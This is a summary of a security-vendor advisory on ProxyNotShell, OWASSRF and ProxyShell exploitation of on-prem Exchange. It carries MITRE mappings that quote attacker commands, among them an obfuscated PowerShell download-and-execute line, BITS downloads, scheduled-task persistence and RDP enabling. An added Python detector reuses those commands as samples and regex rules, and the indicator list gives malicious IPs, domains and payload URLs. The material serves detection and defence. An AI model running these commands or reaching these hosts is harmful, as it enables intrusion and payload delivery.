Bitdefender researchers document ProxyNotShell/OWASSRF exploit chains targeting on-prem Microsoft Exchange, outlining how SSRF can lead to backend access and how multiple exploit chains culminate in RCE and payload deployment. The report also walks through real-world campaigns, including ProxyShell, IABs deploying web shells, Cuba ransomware activity, and the GoBackClient backdoor, with indicators and defensive recommendations.
#ProxyShell #ProxyNotShell #OWASSRF #GoToAssist #Meterpreter #CubaRansomware #Bughatch #OrangeTsai #DEVCORE #CrowdStrike
Keypoints
- ProxyNotShell/OWASSRF/ProxyShell chains target on-prem Exchange via SSRF to reach backend services and potentially execute code.
- Exchange architecture (CAS and backend services) creates an attack surface where SSRF can bypass some protections and enable RCE.
- Attack chains combine SSRF with privilege escalation, code stashing in mailboxes, and PowerShell-based deployment to deliver web shells and backdoors.
- Post-exploitation activity includes persistence (service- or user-based), lateral movement (remote services, file copies), and credential access attempts.
- Real-world cases show IAB activity with web shells, GoToAssist deployments, Cuba ransomware integrations, and GoBackClient backdoor with feature-rich commands.
- Defensive guidance emphasizes defense-in-depth, patching, IP/URL reputation, and robust detection/response to stop reconnaissance and exploitation.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – SSRF exploited to access backend Exchange services and enable remote code execution. Quote: “…SSRF attack… is a type of attack that allows an attacker to send a crafted request from a vulnerable server to a different server…”
- [T1059.001] PowerShell – Use of PowerShell for download, execution, and in-memory operations (including encoded commands). Quote: “powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover…/6.css', 'c:\windows\temp\c.msi')”
- [T1021] Remote Services – Lateral movement via remote control tools (ConnectWise Control, GoToAssist). Quote: “The next action was to move laterally by using GoToAssist.”
- [T1543.003] Create or Modify System Process: Windows Service – Persistence via service-like execution (e.g., svchosts.exe -service). Quote: “c:\programdata\svchosts.exe -service -beacon …”
- [T1505.003] Web Shell – Deploying web shells on Exchange to maintain access. Quote: “A web shell is a malicious program… uploaded to a web server to gain unauthorized access…”
- [T1197] BITS Jobs – Use of Background Intelligent Transfer Service to download additional payloads. Quote: “Start-BitsTransfer -Source …”
- [T1059.001] PowerShell (Obfuscated/Encoded) – Encoded commands and base64 payloads to evade detection. Quote: “Echo chain is also used to generate a VBScript file in location … After this VBScript file is executed, it will read the content of the base64 file …”
- [T1112] Modify Registry – Enabling RDP by modifying HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections to 0. Quote: “enables the RDP by setting the registry value … to 0”
- [T1053] Scheduled Task – Use of schtasks to create tasks for persistence. Quote: “schtasks /create /sc onstart /TN …”
- [T1003] Credential Dumping – Dumping credentials from SAM and LSASS to facilitate further access. Quote: “dumping credentials from the SAM database and LSASS memory…”
- [T1483] Domain Generation Algorithms – Use of DGA to generate C2 domains when the server is unavailable. Quote: “This backdoor uses a domain generation algorithm (DGA) when the server from the configuration file is unavailable.”
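The technique list above is mostly command-line tradecraft (string-concatenation obfuscation hiding `DownloadFile`, `Net.WebClient` plus `Invoke-Expression`, `Start-BitsTransfer` downloads, `fDenyTSConnections` set to 0, `schtasks /sc onstart`, `svchosts.exe -service`). The following is an added detection example, not code from Bitdefender or the report: it folds PowerShell single-quoted string concatenations back into one literal so the real method name is visible, then runs simple rules over process command lines. The sample command lines are constructed here; hostnames use `.invalid` placeholders and are not the advisory's indicators.

```python
import re

# Constructed sample command lines (not taken from the report). The first one
# mirrors the 'D' + 'Own' + 'LOa' + 'DfI' + 'le' concatenation quoted in the
# advisory; the last one is benign and should produce no hits.
SAMPLE_COMMAND_LINES = [
    "powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; "
    "Invoke-Expression (New-Object Net.WebClient).$ds.Invoke("
    "'https://autodiscover.example.invalid/6.css', 'c:\\windows\\temp\\c.msi')",
    "powershell -c Start-BitsTransfer -Source https://example.invalid/addp.dll "
    "-Destination c:\\programdata\\addp.dll",
    "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" "
    "/v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "schtasks /create /sc onstart /TN updater /TR c:\\programdata\\svchosts.exe",
    "c:\\programdata\\svchosts.exe -service -beacon",
    "powershell -c Get-Process | Where-Object { $_.CPU -gt 100 }",
]

# A run of two or more single-quoted literals joined with '+'. Assumption: only
# single-quoted pieces are folded; double-quoted or variable-based joins are not.
_CONCAT = re.compile(r"(?:'[^']*'\s*\+\s*)+'[^']*'")

# Rule name -> regex applied to the folded, lower-cased command line.
RULES = {
    # WebClient object combined anywhere with a DownloadFile/DownloadString call,
    # in either order (the advisory's sample assigns the method name first).
    "webclient_download": re.compile(r"(?=.*net\.webclient)(?=.*download(?:file|string))"),
    "bits_transfer_download": re.compile(r"start-bitstransfer\s+-source\s+https?://"),
    "rdp_enabled_via_registry": re.compile(r"fdenytsconnections.*/d\s+0\b"),
    "schtasks_onstart_persistence": re.compile(r"schtasks\s+/create.*/sc\s+onstart"),
    "svchosts_service_persistence": re.compile(r"svchosts\.exe\s+-service"),
}


def fold_concatenations(cmd):
    """Rewrite 'D' + 'Own' + 'LOa' + 'DfI' + 'le' as 'DOwnLOaDfIle' so that
    plain substring rules see the method name the attacker was hiding."""
    def join(match):
        pieces = re.findall(r"'([^']*)'", match.group(0))
        return "'" + "".join(pieces) + "'"
    return _CONCAT.sub(join, cmd)


def detect(cmd):
    """Return the sorted list of rule names that fire for one command line."""
    hits = []
    # Three or more concatenated literals is itself a signal, independent of
    # what the joined string turns out to be.
    for match in _CONCAT.finditer(cmd):
        if len(re.findall(r"'[^']*'", match.group(0))) >= 3:
            hits.append("string_concat_obfuscation")
            break
    folded = fold_concatenations(cmd).lower()
    for name, pattern in RULES.items():
        if pattern.search(folded):
            hits.append(name)
    return sorted(hits)


def scan(lines):
    """Run detect() over a batch and keep only the lines that fired."""
    results = []
    for index, cmd in enumerate(lines):
        hits = detect(cmd)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_COMMAND_LINES):
        print(index, hits, SAMPLE_COMMAND_LINES[index][:60])
```

Folding runs before matching so that the obfuscated and plain forms of the same download command hit the same rule; in a real pipeline the rules would be fed from Sysmon event 1 or Windows 4688 command lines and PowerShell 4104 script-block text, and the folding step is the piece most worth keeping even if the rules are replaced by your own.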
Indicators of Compromise
- [IP] – 64.190.113.48 and 162.243.150.6 — used to launch attacks and host payloads
- [IP] – 66.42.116.130:443 and 91.206.178.76:443 — Relay servers used by ConnectWise Control
- [IP] – 45.77.91.209:443 and 149.28.249.156:443 — Additional relay servers for C2
- [IP] – 38.135.122.130 and 38.108.119.121 — Hosted payloads and stage servers; multiple binaries downloaded
- [Domain] – lostbussiness[.]com and devoterfo[.]com — hosting the same binaries (Bughatch/Komar)
- [MD5] – 53c2f5ebde7c5417b2b4081070643da1; 43250dd7f3a01c689131849c39f36482 — MD5s of downloaded components
- [URL] – https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/mb.css; https://mail.fcp***.us/owa/auth/Current/themes/resources/ls.css — downloaded payloads
- [URL] – https://devoterfo[.]com:443/komar66.dll; https://devoterfo[.]com:443/komar65.dll; https://devoterfo[.]com:443/addp.dll — various stage/download URLs
- [File] – FrontEnd\HttpProxy\ecp\auth\Logout.aspx; inetpub\wwwroot\aspnet_client\system_web\iisstart.aspx — created web shells
- [File] – GoToAssist Unattended.exe — GoToAssist-related payloads
- [Process] – svchosts.exe -service -beacon — used as a persistence/service process
Read more: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild